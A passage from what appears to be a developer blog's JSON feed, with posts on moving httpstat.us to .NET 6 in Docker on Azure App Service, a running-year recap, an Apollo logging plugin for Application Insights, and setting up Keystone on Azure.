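WORKDIR /src
COPY . .
RUN dotnet publish ./HttpStatus.csproj -c Release -o /app/publish

# runtime stage - copy the published output into the smaller ASP.NET runtime image
FROM mcr.microsoft.com/dotnet/aspnet:6.0 AS final
WORKDIR /app
COPY --from=build /app/publish .
ENTRYPOINT ["dotnet", "HttpStatus.dll"]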
After all, I was running it locally in Docker, so it should work in production using Docker right?\nNo, that’s not what happened, the App Service would time out on start up. After countless deployments, pulling the image locally to test it (it worked locally) and increasingly deep dives into the App Service logging components I was out of ideas as to why it wouldn’t start… Until I got a breakthrough.\nHow App Service validates container startup I decided to sandbox the problem in a brand new .NET 6 app, and add in the code for httpstat.us piece by piece to find the offending line of code. I got to the point where I would add the logic for handling status codes, but as soon as it was added I’d get the following logs (this is from the sample I was rebuilding):\n2021-12-15T23:39:06.601Z INFO - Starting container for site 2021-12-15T23:39:06.606Z INFO - docker run -d -p 80:80 --name aapowell-dotnet6-mvc_0_5778b9ac -e WEBSITES_ENABLE_APP_SERVICE_STORAGE=false -e DOCKER_CUSTOM_IMAGE_NAME=registry20211215115650.azurecr.io/webapplication1:20211215231822 -e WEBSITE_SITE_NAME=aapowell-dotnet6-mvc -e WEBSITE_AUTH_ENABLED=False -e PORT=80 -e WEBSITE_ROLE_INSTANCE_ID=0 -e WEBSITE_HOSTNAME=aapowell-dotnet6-mvc.azurewebsites.net -e WEBSITE_INSTANCE_ID=80fa370e688dca2b88312acd83eb0059bdb22388056f36ce8b5a46f963d6eec6 registry20211215115650.azurecr.io/webapplication1:20211215231822 2021-12-15T23:39:06.609Z INFO - Logging is not enabled for this container. Please use https://aka.ms/linux-diagnostics to enable logging to see container logs here. 2021-12-15T23:39:12.965Z INFO - Initiating warmup request to container aapowell-dotnet6-mvc_0_5778b9ac for site aapowell-dotnet6-mvc 2021-12-15T23:39:46.036Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 33.0710629 sec 2021-12-15T23:40:01.435Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 48.4703022 sec 2021-12-15T23:40:16.762Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 63.7977782 sec 2021-12-15T23:40:33.149Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 80.1846337 sec 2021-12-15T23:40:48.385Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 95.4199035 sec 2021-12-15T23:41:09.251Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 116.2859279 sec 2021-12-15T23:41:24.489Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 131.5245851 sec 2021-12-15T23:41:48.387Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 155.4220304 sec 2021-12-15T23:42:03.615Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 170.6498268 sec 2021-12-15T23:42:18.827Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 185.8618694 sec 2021-12-15T23:42:34.047Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 201.0824415 sec 2021-12-15T23:42:49.304Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. 
Elapsed time = 216.338939 sec 2021-12-15T23:43:03.556Z ERROR - Container aapowell-dotnet6-mvc_0_5778b9ac for site aapowell-dotnet6-mvc did not start within expected time limit. Elapsed time = 230.5910478 sec 2021-12-15T23:43:03.558Z ERROR - Container aapowell-dotnet6-mvc_0_5778b9ac didn't respond to HTTP pings on port: 80, failing site start. See container logs for debugging. 2021-12-15T23:43:03.566Z INFO - Stopping site aapowell-dotnet6-mvc because it failed during startup. The container starts, but then it times out during the warmup request as that never responds, thus the container is killed after 230 seconds, which is the default (yes, I tried increasing the startup timeout, all that did was make it take longer before I knew it failed).\nWith the help of a bunch of Console.WriteLine statements, I was able to watch the startup process of the App Service, and I noticed a request coming to something I didn’t recognise, something like /robots933456.txt, which doesn’t exist in the container. Weird, nothing I’m doing makes that request, so what is it.\nSome web searching later and I landed here which is the App Service docs explaining that file. It turns out that when App Service starts the container, it probes for this file and waits for a 404 response. So, why did it break for me?\nWell, because there’s a bug in httpstat.us’s route handling. First, some background to the way the site works. Any request that comes in that could be a status code is either matched to known ones, or parsed as an unknown and returned. This means that you could request a status code of 999 if you wanted, and we’ll send you back that as a status code. This is really just to help people who are using non-standard web server configurations, rather than just being strictly standards compliant.\nBut as I said, there was a bug. The routing was looking for anything that comes in after the / that we didn’t have a predefined route for (of which we don’t really have many), not just things that are numerical, so the request for /robots933456.txt was being treated as a status code and returned, but since it’s not a valid number, the status code was 0, so App Service was receiving 0 as the status code response rather than the 404 it was expecting, so it’d keep waiting until eventually it timed out.\nI added in an int route constraint, deployed and we were finally working again! 🎉\nOther changes For a little over a month now the site has been running .NET 6 in a container and it seems to be going just fine. 
I need to learn how to use App Insights properly to understand the performance metrics, but in the last hour (as of time of writing) almost 400k requests were served, which seems pretty decent.\nIf you want to self-host it, you can run the same Docker image that is run in production, it’s available via GitHub packages.\nThe other notable changes are:\nResponse Transport-Encoding is chunked, which is the default for Kestrel There’s no more X-Served-By header, that came from IIS and we’re not using that anymore I’d recommend you use the Server header, which is standard It’s HTTPS only, as it should be I haven’t tested CORS, but it should work If it doesn’t open an issue There’s probably other things that have changed, but that’s the stuff that I’m at least aware of.\nNext steps Now that the major rework has been done and the codebase modernised, my next step is to tackle the fair use policy which I’d outlined at the start of 2021.\nI still don’t have a timeline for completing that work, as I need to look at how to best roll it out and not impact current users significantly. In the mean time, chime in on the GitHub issue if you’ve got any questions or feedback on the policy.\n", "id": "2022-01-17-httpstatus-now-with-net-6" }, { "title": "1300km", "url": "https://www.aaron-powell.com/posts/2022-01-12-1300km/", "date": "Wed, 12 Jan 2022 00:17:27 +0000", "tags": [ "running" ], "description": "The story of my running in 2021", "content": "At the start of 2020 I wrote a post called 1000km in which I talked about my running journey throughout 2019 and getting to the goal of 1000km in 12 months.\nTwo years and a global pandemic later, I thought I’d do an update to that post on where I’m at with my running, and what I’ve learnt over the time.\nI won’t go over all the background of “getting into running” in this post, as I covered that last time and I’d encourage you read it to get some more context to what I’ll cover off here.\nThe raw stats According to my Strava profile, in 2021 I ran a total of 1,319km over 103 hours and 51 minutes across 160 separate runs. December was my biggest running month at 170km across (I think) 20 activities (I’m finding Strava frustratingly limiting in the way I was to get insights on my data).\nThis is just shy of 300km more than 2019 but interestingly, in 2019 I did 164 runs, meaning that my average run distance in 2021 was longer (8.2km vs 6.2km). I’d attribute this to the fact that parkrun wasn’t on for a large period of 2021, so I wasn’t restricting myself to 5km runs on Saturdays.\nRunning more seriously As I talked about in the last post, I run for fun and fitness, but it’s not something I’ve been serious about; I’m never going to be an elite athlete or anything.\nThrough 2020 I ran more, mostly out of lockdown boredom, but it was all much of the same, same routes, same times, same, same, same. Towards the end of 2020 I was invited by my running friends to a trial day at a running group they attended, RunLab. This is a coach-led running group at a local park (one that I run around at least once a week anyway!) with a scheduled program. I enjoyed it so ended up signing up and did 3 of the 4 terms in 2021 (I was injured going into a term so sat it out).\nThis was a rather different approach to running for me though. 
Up until now the closest to having a program was the Wednesday with friends where we rotated through 1km intervals, hills and tempo, but it was the same three formats and the only person pushing you harder was yourself.\nRunLab, while you might loosely categorise in the same three buckets, it was more than that. We’d do speed work, but one week it might be 400m reps and the next it’s fartlek, or we’d do some pacing practice before running hills. We’d also do things like warm up/cool down, which I never do on my own (even before races!).\nAll of this saw me shift a bit in my mentality towards running, it is not just a case of “throw on the shoes and pound the pavement” but looking more at it as a workout.\nThe other thing I noticed about my running is being better in tune with what I’m doing. I don’t think I’m that much faster than where I was previously (in fact, my parkrun times have been slower than my 2019 peak), but I now better understand my pace. When I go for a run, I’m less reliant on my watch to tell me what pace I’m running, instead I just know. For the last few weeks, I’ve been running more frequently, so I wanted to hold a slower pace, around 4:45min/km, and I’m able to do that without constant watch checking. I guess it’s a bit hard to describe, but when running I can fairly accurately guess the pace I’m at, confirm with my watch, and adjust accordingly.\nHaving a better understanding of myself and my pacing makes it easier to plan out what runs I’m going to do and how long I expect them to take (so, whether I’ll need to set an alarm, or I can sleep in 😜).\nIt’s also helping me estimate where I’ll be when races do come back. I’m hoping for some in person races in 2022, I’m wanting to target a 95min half marathon and a sub-60min City2Surf. Both should be achievable based on what I’m finding I can run comfortably in training, but we’ll see what injuries crop up.\nInjuries Speaking of injuries, 2021 was the year for them. I’ve not really had major muscle injuries throughout my life, sure there’s been some minor strains here and there, but the only real notable one was in 2019 where I tore my Achilles before City2Surf.\n2021 changed that, I had two major injuries. First it was my hamstring, then it was my calf, both on the right side.\nOn a wet Wednesday at the end of February, we decided to call off the usual group run, and it was everyone’s call as to whether they slept in or did their own thing. I like running in the rain, so I decided to go out on one of my local routes. Since it was a wet morning (think torrential heavy rain), I figured I’d have a crack at a Strava segment I’ve been wanting to reclaim from our former RunLab coach. It’s a 6km segment, pretty much dead flat, and I’d nabbed it from him, to which he countered a few days later (and took 25s/km average off my pace 😭).\nUp until this point my training was going well, I was feeling strong but I’d still have to push to my threshold to get it, so I did a 1km warm up before putting the foot down. There was no one on the path, the rain was coming down hard and I was splashing through puddles. It felt good for the first ~3km but coming to the end of the 3rd km, I could feel my hamstring stiffening up. That wasn’t good, so I decided to ditch going for the Strava crown and ease it back a bit, as I’m 4km from home now (it’s an out-and-back loop with a 1km warm up/cool down on the 6km segment). 
Another km down and it’s not loosening up even at a slower pace, so I keep dropping down until… snap, my hamstring goes.\nI’m a little over 3km from home with nothing more than my clothes and watch (I tended not to run with my phone), it’s raining hard and my hamstring has given out on me. I hobbled home, in about the same amount of time it’d taken for me to do the 5.5km and booked into the physio. Thankfully it wasn’t too bad an injury and I was only off running for a few weeks, but it was a setback in keeping on track for my distance goals.\nFast forward to May and it was time for another injury! We were doing 1km intervals at RunLab and I felt my calf get really tight, so I eased back the speed and it felt ok, not perfect, but ok. I thought I might be on the edge of another muscle strain, so I decided to take a week off running, run parkrun the following week but it was still not right. Skipped a long run that week, went out with my Wednesday crew, nope, calf still sore. Another week of rest, went to RunLab and it was clear that things aren’t getting better, so, back to the physio!\nWhat I learnt is that my approach of “oh, might be a strain, let’s do no exercise at all” is a really bad way to tackle recovery. Basically, what was happening was that the muscle was generating scare tissue around the injury site, but since I was doing no exercise (working from home means I wasn’t even getting incidental exercise from walking anywhere) I wasn’t stretching the new tissue out, so as soon as I ran (resulting in a long stride), it would re-tear. Rinse and repeat this for a few weeks and I’d done a huge disservice to my body… and my wallet in getting myself fixed!\nPro tip - unless you actually know what you’re doing, don’t try to self-diagnose and fix a muscle tear!\nReturning from injuries and new goals While I was recovering from the calf tear, I got back into cycling, first on a stationary bike, then out on my road bike. This helped keep a level of fitness and strength up, so when I could run again it would be from an ok base.\nBut my yearly goal of 1300km was looking unlikely, I’m hundreds of km behind where I should be, so I resided to the fact that it wasn’t to be this year and I should just focus on getting fit and strong again.\nThen we went into lockdown for several months in Sydney. I was no longer able to go to the gym and ride the stationary bike, my cycling route was out of bounds due to movement restrictions, but thankfully my calf was on the mend, so I got back into running again. I wasn’t going to be going for any crowns or long distance, but I could still pick it up a bit more.\nBy the time September rolled around I was feeling towards my peak (at least for 2021!), being comfortable with 15km at 4:30 pace and able to run 35km+ per week. I also saw my yearly goal getting closer and closer. Going with my usual plan, I needed to run 26km per week to make 1300km (with 2-week buffer), but I’d already used more than my 2 week buffer but could commit to nearly 10km over, so maybe it would be possible.\nCome the middle of December and I did the maths, I had around 90km left and 15 days to go, so I’d need to average 6km per day to hit it… doable but tough (I’ve never done a streak like that). I did a long run on the 19th and it saw me hit 50km in a week for the first time ever (50.2km to be exact). This meant I’d banked some km and took the 20th and 21st off, then started chipping away again. 
I ran some overage and by Christmas it was clear that I’d make my distance goal, but I decided to try for something else, 2 weeks of daily running. I hadn’t missed a day since the 22nd of December, so I needed to keep going until the 5th January.\nThe last week of 2021 (and the first two days of 2022) saw me get a new weekly peak of 52.8km, and pushing it through to the 5th January saw me complete my two week challenge in which I ran 115km across 18 activities (I had a few double up days with parkrun 😜), but I did it and my legs earned a few days rest (ok, they really only got one day off).\nTech For years I’ve used a Fitbit as my tracker when running, but after years of frustration with how they end-of-life their top-end devices after a single generation, I went back to Garmin. I got myself a Fenix 6 Pro, migrated my data and haven’t looked back.\nI’ve not really made the most of the device yet, I’m going to do more with the workouts feature in 2022, but it’s a decent device and does the level of tracking that I realistically need.\nThe other thing I got myself was a massage gun for Christmas, a Theragun Prime. My wife gave me a hard time about it, but after a few goes, she’s a convert. While doing my 14-day challenge, I would use it before and after, especially on my calves and ankles, which are where I’m finding most stiffness.\nA bonus of my job is that I’m often watching recordings of meetings, so while sitting and watching, I grab it out and work through whatever is sore at the time!\nStrava is still the main place that I track my data, but while preparing for this post, I’ve come to realise that it’s quite frustrating to get insights into your own data in ways you want. It’s really lacking much in the way of reporting and visualisation. Garmin Connect doesn’t seem to be much better, so I might ponder on how to better produce the insights that I’d like myself.\nConclusion I’ve definitely changed my perspective on running over the past few years, from it being something I do to keep some fitness up, to something I do because I enjoy it and want to get better. I’m by no means an elite runner, nor will I ever be, and while 1300km seems like a lot, it’s all relative (one of the ladies I run with did over 3000km in 2021!). Taking it more seriously has been useful for me to understand my body better with running, learn how to run and hold pace better and I’ll be interested to see that in a race situation.\nFor 2022 I’m stretching myself with a goal of 1500km. Let’s see what injuries have to say about that!\n", "id": "2022-01-12-1300km" }, { "title": "2021 a Year in Review", "url": "https://www.aaron-powell.com/posts/2022-01-11-2021-a-year-in-review/", "date": "Tue, 11 Jan 2022 00:03:54 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "It’s that time of year again, time for reflection on past year and compare that to what I hoped to achieve in the previous post. Seemingly, this is the latest I’ve gotten to writing the post in a while, but it’s still the first half of January, so it’s not too late…\nBlogging Blogging has always been a mainstay of my online life, and something that’s been important to me, but last year was hard. Looking at the raw numbers, I did 29 posts, which is a little over half of what I did in 2020. 
There’s a few things that contributed to this, but one of the main things is that I spent more time trying to tackle some larger ideas that will pay off in longer blog series, rather than a lot of short and sharp posts which I’ve done a lot of in the past.\nI continued on my GraphQL on Azure series, and I’ve got a few more things that I want to blog about on that topic, it’s just a matter of finding the time to dig into them properly.\nAnother thing I did a bit of last year was getting back into the CMS space, in which I started working with both Strapi and Keystone and ensure they would have good docs on how to deploy to Azure. I’m working with the Strapi team at the moment to get improved docs and I created a Keystone sample app that links from their docs. Again, these are parts of larger projects I’m tackling, so they take some time to get the initial work up and running.\nLeadership The joke at Microsoft is that the most certain part of your career is a reorg, and we had one of those in the middle of 2021, our manager left to take the manager role of another part of Advocacy, which saw us without a manager. I’d been working closely with them on our FY22 strategy, so while the HR process of hiring a new manager was undertaken, I stepped into the manager role myself.\nThis is the first time I’d been a manager at Microsoft, even if it was only for the interim, and I found myself very much in the deep end. All of a sudden I had reports all over the globe, from Israel to France, Brazil to the US (and try and find a time when you can all be in a meeting at once, go on, I’ll wait…), so my job really shifted. Rather than focusing on the projects I was tackling, I started picking up those our former manager had been doing. I was scheduling 1:1’s with everyone on the team, getting properly across the projects they were all doing (we also had two new people join our team, so I had to get up to speed with their projects which were mostly net-new to me), undertake reporting, work out what partner teams across the business we can support, undertake performance reviews and start planning for 2022.\nIt was a great learning experience for me, and it was probably the best way for me to get a taste of management, leading a team I already knew and in a tech space I’m familiar with, but we’ve got a permanent lead joining shortly and I’m looking forward to stepping back into my pervious role and supporting the new lead.\nPresenting While 2020 was the year everyone tried to become an online presenter and Twitch streamer, I feel like 2021 was the year everyone tried to avoid doing that, myself included.\nDon’t get me wrong, I still did a few online presentations, I talked F# and web dev, joined a panel to talk about Serverless and discussed a web devs toolbox, plus some others for user groups around the country, but I was much more selective about it as I find presenting virtually a lot more draining an experience.\nI also stopped streaming. I talked about this in the 2020 reflection post, so many people went into dev streaming in 2020 but I don’t think any of us really thought through the value of it. Dev streaming is hard work, you need to be talking to the audience, regardless of how big or small they are, constantly so that they know what’s going on and can follow your thought processes. And then there’s the challenge of context. 
If you’re doing a live stream, can someone just pop in part way through and understand what’s going on, without having to review the previous however many hours you’ve been on air for? what if it’s a series stream, can someone tune into part 3 without the others being watched first?\nDon’t get me wrong, it’s possible to be a dev streamer and be successful with it, Glaucia on my team does it well, just a lot of us didn’t.\nBuilding a house At the end of the 2021 post I mentioned that my wife and I were building a new house. Well, it’s 2022 and… we’re still building a house 😒.\nBetween stuff ups with our builder (when they say they’ve submitted something to the council for approval, it doesn’t mean they have…), to delays getting demolition completed and signed off, to COVID shutting down construction in Sydney, we’re somewhat behind schedule.\nIt shouldn’t be that much longer, but as anyone who has built a house will tell you, delays are to be expected, so I’ll just say that I hope that when I write this post next year, it’s from the new house and not the rental we’re currently in! 😅\nLooking to 2022 Like last year, I’m going to avoid making any major predictions for what I’ll be doing in 2022 as COVID is meaning we’re really looking at things day to day, and long term planning becomes a somewhat abstract concept.\nI hope to get through some of the larger projects on my backlog as I’m really excited at how a bunch of this stuff can come together to solve problems people are having.\nAnd I hope that the year is just a little bit easier to manage.\n", "id": "2022-01-11-2021-a-year-in-review" }, { "title": "GraphQL on Azure: Part 8 - Logging", "url": "https://www.aaron-powell.com/posts/2021-12-07-graphql-on-azure-part-8-logging/", "date": "Tue, 07 Dec 2021 04:34:53 +0000", "tags": [ "azure", "javascript", "graphql" ], "description": "Logging and monitoring are important to understand how an app is performing, so let's integrate that into Apollo", "content": "As we’ve been looking at how to run GraphQL on Azure we’ve covered several topics of importance with Azure integration, but what we haven’t looked at is how we make sure that we are getting insights into our application so that if something goes wrong, we know about it. 
So for this post we’re going to address that as we take a look at logging using the Azure Application Insights platform (often referred to as AppInsights).\nIf you’re deploying into Azure in the ways that we’ve looked at in this series, chances are you’re already using AppInsights, as it’s the cornerstone of Azure’s monitoring platform, so let’s look at how to get better insights out of our GraphQL server.\nSide note: There’s a lot more you can do with AppInsights in monitoring your infrastructure, monitoring across resources, etc., but that’ll be beyond the scope of this article.\nTracing Requests Apollo has a plugin system that allows us to tap into the life cycle of the server and the requests it receives/responds to, so that we can inspect them and operate against them.\nLet’s have a look at how we can create some tracing through the request life cycle with a custom plugin.\nWe’ll need the applicationinsights npm package, since this is a Node.js app and not client side (there are different packages depending on whether you’re doing server or client side JavaScript).\nI’m also going to use the uuid package to generate a GUID for each request, allowing us to trace the events within a single request.\nLet’s get started coding:\nimport { ApolloServerPlugin, GraphQLSchemaContext, GraphQLServerListener } from "apollo-server-plugin-base"; import { TelemetryClient } from "applicationinsights"; import { v4 as uuid } from "uuid"; export default function( input: string | TelemetryClient, logName?: string ): ApolloServerPlugin { let client: TelemetryClient; if (typeof input === "string") { client = new TelemetryClient(input); } else { client = input; } return {}; } Here’s the starting point. I’m making this a generic plugin to which you can either pass the Instrumentation Key for AppInsights, or an existing TelemetryClient (the thing you create using the npm package), which allows you to create a unique client or share it with the rest of your codebase.
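Before digging further into the plugin internals, here’s roughly how it would be wired up. This is a minimal sketch: the import path is a placeholder for wherever you keep the plugin, and the Instrumentation Key would come from your own configuration.

import { ApolloServer, gql } from "apollo-server";
import { TelemetryClient } from "applicationinsights";
// placeholder path - wherever the plugin factory above lives in your codebase
import appInsightsPlugin from "./appInsightsPlugin";

// a trivial schema, just to make the sample self-contained
const typeDefs = gql`
  type Query {
    ping: String
  }
`;
const resolvers = { Query: { ping: () => "pong" } };

const server = new ApolloServer({
  typeDefs,
  resolvers,
  // pass an Instrumentation Key and let the plugin create its own client...
  plugins: [appInsightsPlugin("<instrumentation-key>")]
  // ...or share an existing client: appInsightsPlugin(new TelemetryClient("<instrumentation-key>"))
});

server.listen();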
I’ve also added an optional logName argument, which we’ll put in each message for easy querying.\nTime to hook into our life cycle:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 export default function( input: string | TelemetryClient, logName?: string ): ApolloServerPlugin { let client: TelemetryClient; if (typeof input === "string") { client = new TelemetryClient(input); } else { client = input; } return { requestDidStart(context) { const requestId = uuid(); const headers: { [key: string]: string | null } = {}; if (context.request.http?.headers) { for (const [key, value] of context.request.http.headers) { headers[key] = value; } } client.trackEvent({ name: "requestDidStart", time: new Date(), properties: { requestId, metrics: context.metrics, request: context.request, headers, isDebug: context.debug, operationName: context.operationName, operation: context.operation, logName } }); } }; } The requestDidStart method will receive a GraphQLRequestContext which has a bunch of useful information about the request as Apollo has understood it, headers, the operation, etc., so we’re going to want to log some of that, but we’ll also enrich it a little ourselves with a requestId that will be common for allow events within this request and the logName, if provided.\nYou might be wondering why I’m doing headers in the way I am, that’s because context.request.http.headers is an Iterable and won’t get serialized properly, so we need to convert it into a standard object if we want to capture them.\nWe send this off to AppInsights using client.trackEvent:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 client.trackEvent({ name: "requestDidStart", time: new Date(), properties: { requestId, metrics: context.metrics, request: context.request, headers, isDebug: context.debug, operationName: context.operationName || context.request.operationName, operation: context.operation, logName } }); The name for the event will help us find the same event multiple times, so I’m using the life cycle method name, requestDidStart, and popping the current timestamp on there. 
Since I’m using trackEvent, this will appear in the customEvents table within AppInsights, but you could use trackTrace or any of the other tables for storage, depending on how you want to query and correlate your logs across services.\nThis is an example of how that will appear in AppInsights; you can see the custom information we’ve pushed, such as the GraphQL operation and its name, the headers, etc.\nWe could then write a query against the table for all operations named TestQuery:\ncustomEvents | extend req = todynamic(tostring(customDimensions.["request"])) | where req.operationName == 'TestQuery' The plugin can then be expanded out to cover each of the life cycle methods, pushing the relevant information to AppInsights and allowing you to understand the life cycle of your server and requests.\nConclusion This is a really quick look at how we can integrate Azure Application Insights into the life cycle of Apollo Server and get some insights into the performance of our GraphQL server.\nI’ve created a GitHub repo with this plugin, and it’s available on npm.\nThere’s another package in the repo, apollo-server-logger-appinsights, which provides a generic logger for Apollo, so that any logging Apollo (or third-party plugins) does will be pushed to AppInsights.\nHappy monitoring!\n", "id": "2021-12-07-graphql-on-azure-part-8-logging" }, { "title": "State of Serverless Panel at GraphQL Summit", "url": "https://www.aaron-powell.com/posts/2021-11-16-state-of-serverless-panel-at-graphql-summit/", "date": "Tue, 16 Nov 2021 05:37:19 +0000", "tags": [ "serverless", "speaking", "azure" ], "description": "Catch up on the panel session on the State of Serverless from GraphQL Summit 2021", "content": "Recently I was invited by the organisers of GraphQL Summit 2021 to be part of a panel about the State of Serverless.\nI joined the delightful Natalie Davis and Sunil Pai, and we had the awesome MC, Ivonne Roberts. It was a great bit of fun, we talked about some really interesting things, and I even had Zoom crash on me during the session 🤣!\nYou can check out the recording on YouTube.\n", "id": "2021-11-16-state-of-serverless-panel-at-graphql-summit" }, { "title": "Scaffolding Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-11-16-scaffolding-static-web-apps/", "date": "Tue, 16 Nov 2021 03:41:40 +0000", "tags": [ "javascript", "azure" ], "description": "I make a lot of Azure Static Web Apps, so I make it easier to scaffold them.", "content": "\nModified version of this comic\nOver the past 18 months I’ve created a lot of Azure Static Web Apps, like… a lot. I’ve hit the quota of free apps several times and had to clean out demos to keep testing things!\nBut it’s always a little bit tedious, running create-react-app, setting up Functions, etc., so I went about creating a GitHub repo template for a basic React + TypeScript + Functions app. Then sometimes I’d be wanting a different framework, so I’d go off hunting for a new template, rinse and repeat.\nEnter create-swa-app To tackle this, I decided to create a command line tool to be used with npm init, @aaronpowell/swa-app, which will guide you through the creation using one of the templates listed on awesome-static-web-apps.
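If I’m reading npm’s initializer convention right, kicking it off is a one-liner (treat the exact command as an assumption and check the repo’s README for the canonical usage):

npm init @aaronpowell/swa-app

and then follow the prompts to pick a template.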
It will also offer to create a GitHub repo for you using the template (this will prompt for a GitHub sign in workflow), so you’ll be ready to deploy it to Azure!\nThink of this as a helpful starting point before jumping into the SWA CLI or VS Code extension.\nHopefully you’ll find this as a useful way to scaffold up a Static Web Apps project!\n", "id": "2021-11-16-scaffolding-static-web-apps" }, { "title": "Keystone on Azure: Part 2 - Hosting", "url": "https://www.aaron-powell.com/posts/2021-11-02-keystone-on-azure-part-2-hosting/", "date": "Tue, 02 Nov 2021 01:28:25 +0000", "tags": [ "azure", "graphql", "javascript" ], "description": "We've got local dev with Keystone working, now we'll look at what we need for hosting", "content": "In today’s article, we’re going to look at what resources in Azure we’re going to need to host Keystone.\nAt its core Keystone is an Express.js application so we’re going to need some way to host this. Alas, that means that my standard hosting model in Azure, Azure Functions, is off the table. It’s not setup for hosting a full web server like we have with Express.js, so we need something else.\nDatabases For data storage, Keystone uses Prisma to do data access normalisation, no need for separate providers for the different SQL databases or MongoDB, etc. but they are restricting support of the database to SQLite and PostgreSQL for the time being.\nSQLite shouldn’t be used for production, so instead, we’ll use Azure Database for PostgreSQL, which gives us a managed PostgreSQL instance (or cluster, depending on the scale needs). No need to worry about backup management, patching, etc. just leverage the hosted service in Azure and simplify it all.\nAzure AppService The service in Azure that we’re going to want is AppService (it’s also called WebApps in some places, but for simplicities sake, I’ll use the official service name). AppService gives you a Platform as a Service (PaaS) hosting model, meaning we’re not going to need to worry about underlying hosting infrastructure (OS management, disk management, etc.), we just select the scale that we need and Azure takes care of it.\nMy preference for Node.js apps is to host on a Linux AppService, rather than a Windows host, and that’s mainly because my experience has suggested that it’s a better fit, but at the end of the day, the OS doesn’t make any difference, as in a PaaS model, you don’t have to care about the host.\nSide note - when you’re running on a Linux AppService, it’s actually running within a Container, not directly on the host. This is different to AppService Containers which is for BYO Containers. Either way, for doing diagnostics, you may be directed to Docker output logging.\nStoring images and files Since we’re using PaaS hosting, we need some way to store images and files that the content editor uploads in a way that doesn’t use the local disk. After all, the local disk isn’t persistent in PaaS, as you scale, redeploy, or Azure needs to reallocate resources, the local disk of your host is lost.\nThis is where Azure Storage is needed. Files are pushed into it as blobs and then accessed on demand. 
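If you’re standing the storage account up by hand, the Azure CLI commands look roughly like this (a sketch; the resource group, account and container names are all placeholders):

# create the storage account
az storage account create --name keystonedemostorage --resource-group keystone-demo --location australiaeast --sku Standard_LRS

# create a container for uploaded images/files, allowing anonymous read access to individual blobs
az storage container create --name uploads --account-name keystonedemostorage --public-access blob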
There are several security modes in which you can store blobs, but the one that’s most appropriate for a tool like Keystone is to use Anonymous Blob Access, which means that anyone can access the Blob in a read-only manner, but they are unable to enumerate over the container and find other blobs that are in there.\nTo work with Azure Storage in Keystone, you need to use a custom field that I’ve created for the k6-contrib project @k6-contrib/fields-azure. The fields can be used either with the Azurite emulator or an Azure Storage account, allowing for disconnected local development if you’d prefer.\nConclusion Today we’ve started exploring the resources that we’ll need when it comes time to deploy Keystone to Azure. While it’s true you can use different resources, Virtual Machines, Container orchestration, etc., I find that using a PaaS model with AppService and a managed PostgreSQL database is the best option, as it simplifies the infrastructure management the team needs to undertake, letting them focus on the application at hand instead.\n", "id": "2021-11-02-keystone-on-azure-part-2-hosting" }, { "title": "Keystone on Azure: Part 1 - Local Dev", "url": "https://www.aaron-powell.com/posts/2021-11-02-keystone-on-azure-part-1-local-dev/", "date": "Tue, 02 Nov 2021 00:19:08 +0000", "tags": [ "azure", "graphql", "javascript" ], "description": "It's time to start a new series on using Keystone on Azure. Let's look at how we setup a local dev environment.", "content": "As I’ve been exploring GraphQL on Azure through my series of the same name I wanted to take a look at how we can run applications that provide GraphQL as an endpoint easily, specifically those which we’d class as headless CMSs (Content Management Systems).\nSo let’s start a new series in which we look at one such headless CMS, Keystone 6. Keystone is an open source project created by the folks over at Thinkmill and gives you a code-first approach to creating content types (models for the data you store), a web UI to edit the content and a GraphQL API via which you can consume the data.\nNote: At the time of writing, Keystone 6 is still in pre-release, so some content might change when GA hits.\nIn this series we’re going to create an app using Keystone, look at the services on Azure that we’d need to host it and how to deploy it using GitHub Actions. But first up, let’s look at the local development experience and how we can optimise it for the way that (I think) gives you the best bang for buck.\nSetting up Keystone The easiest way to set up Keystone is to use the create-keystone-app generator, which you can read about in their docs. I’m going to use npm as the package manager, but you’re welcome to use yarn if that’s your preference.\n1 npm init keystone-app@latest azure-keystone-demo This will create the app in the azure-keystone-demo folder, but feel free to change the folder name to whatever you want.\nConfiguring VS Code I use VS Code for all my development, so I’m going to show you how to set it up for optimal use in VS Code.\nOnce we’ve opened VS Code the first thing we’ll do is add support for Remote Container development.
I’ve previously blogged about why you need remote containers in projects and I do all of my development in them these days as I love having a fully isolated dev environment that only has the tooling I need at that point in time.\nYou’ll need to have the Remote - Containers extension extension installed.\nOpen the VS Code Command Pallette (F1/CTRL+SHIFT+P) and type Remote-Containers: Add Development Container Configuration Files and select the TypeScript and Node.js definition.\nBefore we reopen VS Code with the remote container we’re going to do some tweaks to it. Open the .devcontainer/devcontainer.json file and let’s add a few more extensions:\n1 2 3 4 5 6 7 8 9 "extensions": [ "dbaeumer.vscode-eslint", "esbenp.prettier-vscode", "apollographql.vscode-apollo", "prisma.prisma", "github.vscode-pull-request-github", "eg2.vscode-npm-script", "alexcvzz.vscode-sqlite" ], This will configure VS Code with eslint, prettier, Apollo’s GraphQL plugin (for GraphQL language support), Prisma’s plugin (for Prisma language support), GitHub integration, npm and a sqlite explorer.\nSince we’re using SQLite for local dev I find it useful to install the SQLite plugin for VS Code but that does mean that we need the sqlite3 package installed into our container, so let’s add that by opening the Dockerfile and adding the following line:\n1 2 RUN apt-get update && export DEBIAN_FRONTEND=noninteractive \\ && apt-get -y install --no-install-recommends sqlite3 Lastly, I like to add a 